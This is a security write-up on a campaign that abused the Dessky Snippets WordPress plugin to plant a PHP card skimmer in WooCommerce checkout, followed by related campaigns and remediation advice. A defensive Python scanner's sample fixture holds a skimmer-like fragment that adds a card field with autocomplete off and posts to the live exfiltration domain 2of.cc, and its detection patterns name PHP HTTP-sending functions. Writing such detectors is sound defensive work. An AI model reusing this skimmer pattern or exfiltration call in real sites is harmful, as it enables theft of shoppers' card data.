Malicious PHP Code Injection via Lesser-Known WordPress Plugin Abuses
On May 11, 2024, Sucuri identified a malicious campaign targeting WordPress websites through the exploitation of a lesser-known plugin called Dessky Snippets. With over 200 active installations, this plugin allows users to add custom PHP code to their sites. However, threat actors have manipulated this feature to inject malicious PHP code designed to harvest credit card data. The campaign highlights a significant security risk, as the injected code compromises the checkout process on WooCommerce sites by adding unauthorized fields to collect sensitive information such as names, addresses, credit card numbers, expiry dates, and CVV numbers. This stolen data is then exfiltrated to a remote URL. The attack method underscores the broader trend of cybercriminals exploiting legitimate plugins to conduct sophisticated attacks, emphasizing the need for WordPress site administrators to maintain strong security practices. Regular updates, stringent access controls, and continuous monitoring are essential to safeguard against such vulnerabilities. This incident also illustrates the critical importance of securing all plugins, regardless of their popularity, to prevent unauthorized access and data breaches.
Details of the Campaign
Exploitation of the Dessky Snippets Plugin
Attackers gain administrator access through known vulnerabilities in WordPress plugins or by using easily guessable credentials. Once they have access, they install or manipulate the Dessky Snippets plugin to insert server-side PHP credit card skimming malware.
Malicious Code Injection
The inserted malicious code is stored in the dnsp_settings option within the WordPress wp_options table. This code is designed to modify the WooCommerce checkout process by manipulating the billing form. It injects additional fields into the form, requesting sensitive credit card details such as names, addresses, credit card numbers, expiry dates, and CVV numbers. These details are then exfiltrated to the URL hxxps://2of[.]cc/wp-content/.
Autocomplete Attribute Disabled
An important aspect of this attack is the manual disabling of the autocomplete feature on the fake checkout form. By setting autocomplete="off" on the injected fields, the attackers reduce the likelihood that browsers will warn users about entering sensitive information. This also ensures that the fields remain blank until manually filled in by users, making them appear as regular, necessary inputs and reducing suspicion.
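As an added example for the two sections above (this is not Sucuri's tooling, not the Dessky Snippets plugin's code, and not the campaign's actual skimmer), the following Python script scans exported wp_options rows for the indicators the report describes: PHP stored in the dnsp_settings option, card-like input fields with autocomplete set to off, and outbound HTTP calls to a remote host, in particular the exfiltration domain 2of[.]cc. Only the option name, the domain and the autocomplete trick come from the report; the regular expressions, the WooCommerce checkout-hook heuristic and the sample rows are assumptions constructed for the demonstration, and the suspicious row is a non-functional fragment that carries only the tell-tale strings.

```python
"""Scan exported WordPress wp_options rows for the skimmer indicators described
in the report. Added example, not Sucuri's tooling or the plugin's own code.
Rows are assumed to be (option_name, option_value) pairs, e.g. taken from
`wp option list --format=json` or from a SELECT on the wp_options table."""
import re
from dataclasses import dataclass

# Indicators taken from the report.
EXFIL_DOMAIN = "2of.cc"              # written defanged in the report as 2of[.]cc
SNIPPET_OPTIONS = {"dnsp_settings"}  # option where Dessky Snippets stores its PHP

# Heuristic patterns (assumptions of this example, not from the report).
# Quotes may be backslash-escaped inside a serialized or escaped option value.
CARD_FIELD = re.compile(r"""name\s*=\s*\\?["']?\w*(card|cc_|cvv|cvc|expir)""", re.I)
AUTOCOMPLETE_OFF = re.compile(r"""autocomplete\s*=\s*\\?["']?off""", re.I)
REMOTE_URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
HTTP_SENDER = re.compile(
    r"\b(curl_init|curl_exec|file_get_contents|fsockopen|wp_remote_post|wp_remote_request)\s*\(")
CHECKOUT_HOOK = re.compile(r"woocommerce_\w*checkout\w*")  # any WooCommerce checkout hook


@dataclass
class Finding:
    option: str
    severity: str  # "critical", "high" or "info"
    reason: str


def scan_option(name: str, value: str) -> list:
    """Return findings for one wp_options row; an empty list means nothing matched."""
    findings = []
    domains = {d.lower() for d in REMOTE_URL.findall(value)}
    # Any option that references the known exfiltration domain is a confirmed hit.
    if EXFIL_DOMAIN in domains:
        findings.append(Finding(name, "critical",
                                f"references known exfiltration domain {EXFIL_DOMAIN}"))
    if name in SNIPPET_OPTIONS:
        card = bool(CARD_FIELD.search(value))
        ac_off = bool(AUTOCOMPLETE_OFF.search(value))
        sender = bool(HTTP_SENDER.search(value))
        hook = bool(CHECKOUT_HOOK.search(value))
        if card and ac_off:
            findings.append(Finding(name, "high",
                                    "adds card-like input fields with autocomplete disabled"))
        if sender and domains:
            findings.append(Finding(name, "high",
                                    "sends HTTP requests to " + ", ".join(sorted(domains))))
        if hook and (card or sender):
            findings.append(Finding(name, "high",
                                    "hooks the WooCommerce checkout and collects or sends data"))
        # A stored snippet that trips no rule still deserves a manual look.
        if value.strip() and not findings:
            findings.append(Finding(name, "info", "code snippet present; review contents manually"))
    return findings


def scan_options(rows) -> list:
    """Scan an iterable of (option_name, option_value) rows."""
    findings = []
    for name, value in rows:
        findings.extend(scan_option(name, value))
    return findings


# Constructed sample rows for the demonstration (not real captured data).
BENIGN_SNIPPET = 'add_action("wp_footer", function () { echo "<p>Thanks for visiting</p>"; });'
SUSPICIOUS_SNIPPET = (
    "add_action('woocommerce_after_checkout_billing_form', function () { ?>"
    '<input type="text" name="billing_card_number" autocomplete="off">'
    "<?php /* constructed fragment: further fields and handling elided */ });"
    "wp_remote_post('https://2of.cc/wp-content/', /* elided */);"
)
SAMPLE_ROWS = [
    ("blogname", "Example Store"),
    ("dnsp_settings", BENIGN_SNIPPET),
    ("dnsp_settings", SUSPICIOUS_SNIPPET),
]

if __name__ == "__main__":
    for f in scan_options(SAMPLE_ROWS):
        print(f"[{f.severity:>8}] {f.option}: {f.reason}")
```

The severity tiers are deliberate: a match on the known domain alone is enough to act on, the combined heuristics (card fields plus autocomplete off, a remote sender, a checkout hook) flag an unknown variant, and any code at all in the snippet option is surfaced as informational, because the report's point is that a legitimate snippet plugin is the delivery vehicle and its stored code should be reviewed whenever the site's integrity is in question.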
Previous Instances of Similar Attacks
WPCode Code Snippet Plugin Abuse
Last month, Sucuri reported a case in which attackers misused the WPCode code snippet plugin, another legitimate snippet plugin, to inject malicious JavaScript into WordPress sites that redirected visitors to VexTrio domains. The incident underscores that even widely used plugins can be turned to malicious ends. Attackers' abuse of these plugins highlights the critical need for regular updates, vigilant monitoring, and comprehensive security practices among WordPress site administrators. This type of attack not only disrupts the user experience but also increases the risk of exposing visitors to further cyber threats. The event serves as a reminder of the importance of maintaining strong security measures to protect website integrity and user trust against the growing sophistication of cyber threats targeting popular web platforms.
Sign1 Malware Campaign
In another campaign known as Sign1, more than 39,000 WordPress sites were compromised through malicious JavaScript injections exploiting the Simple Custom CSS and JS plugin. This attack redirected users to scam sites, emphasizing a disturbing trend of abusing legitimate plugins for nefarious purposes. The widespread infection underscores the vulnerabilities inherent in third-party plugins and the increasing sophistication of cyber threats targeting WordPress platforms. The malicious JavaScript code embedded in the sites not only disrupted user experience but also posed significant security risks by potentially leading visitors to phishing or malware-laden pages. This incident highlights the urgent need for WordPress site administrators to be vigilant about plugin security, ensuring regular updates, and conducting thorough security audits to protect against such pervasive threats. As cybercriminals continue to evolve their tactics, the importance of robust security measures and proactive monitoring becomes ever more critical in safeguarding website integrity and user data.
Recommendations for WordPress Site Owners
Given the increasing sophistication of these attacks, particularly targeting e-commerce functionalities, WordPress site owners should take the following precautions:
- Keep Sites and Plugins Updated: Regularly update WordPress core, themes, and plugins to patch known vulnerabilities.
- Use Strong Passwords: Implement strong, unique passwords to prevent brute-force attacks.
- Regular Site Audits: Conduct frequent audits of the site to detect signs of malware or unauthorized changes.
- Monitor for Unauthorized Plugins: Regularly check for any unauthorized plugin installations or modifications.
Remediation Steps for Compromised WordPress Sites
- Isolate the Site: Take the site offline to prevent further damage and protect users.
- Backup the Site: Create a complete backup of the site, including the database and all files.
- Remove Malicious Code: Use security plugins to scan for malicious code and manually inspect and clean infected files.
- Update All Software: Update WordPress core, plugins, and themes to their latest versions.
- Strengthen Security: Change all passwords to strong, unique ones and enable two-factor authentication (2FA).
- Secure Configuration and Hardening: Remove unused plugins and themes, follow security best practices, and configure security plugins.
- Monitor and Audit: Schedule regular security scans and log monitoring to detect and respond to suspicious activity.